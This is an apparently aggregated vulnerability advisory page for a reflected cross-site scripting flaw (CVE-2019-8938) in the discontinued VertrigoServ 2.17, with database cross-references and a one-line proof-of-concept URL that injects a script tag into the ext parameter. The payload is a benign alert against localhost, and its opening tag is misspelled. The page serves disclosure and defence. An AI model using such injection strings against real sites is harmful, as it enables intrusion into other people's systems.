VertrigoServ 2.17 Cross Site Scripting Vulnerability

🗓️ 21 Feb 2019 00:00:00Reported by Rafael PedreroType

zdt🔗 0day.today👁 36 Views

VertrigoServ 2.17 XSS in /inc/extensions.ph

Reporter	Title	Published	Views	Family All 8
CVE	CVE-2019-8938	17 Mar 201918:38	–	cve
Cvelist	CVE-2019-8938	17 Mar 201918:38	–	cvelist
EUVD	EUVD-2019-18326	7 Oct 202500:30	–	euvd
NVD	CVE-2019-8938	21 Mar 201916:01	–	nvd
OSV	CVE-2019-8938	21 Mar 201916:01	–	osv
Packet Storm	VertrigoServ 2.17 Cross Site Scripting	20 Feb 201900:00	–	packetstorm
Prion	Design/Logic Flaw	21 Mar 201916:01	–	prion
RedhatCVE	CVE-2019-8938	22 May 202509:17	–	redhatcve

<!--
# Exploit Title: Cross Site Scripting in VertrigoServ 2.17
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://vertrigo.sf.net
# Software Link: http://vertrigo.sf.net
# Version: VertrigoServ 2.17
# Tested on: All
# CVE : CVE-2019-8938
# Category: webapps

1. Description

VertrigoServ 2.17 allows XSS via the /inc/extensions.php ext parameter.
NOTE: This product is discontinued.


2. Proof of Concept

http://127.0.0.1/inc/extensions.php?ext=<scrript>alert(1)</script>

3. Solution:

The product is discontinued. Update last version

-->

#  0day.today [2019-03-09]  #

21 Feb 2019 00:00Current

6.4Medium risk

Vulners AI Score6.4

EPSS0.00285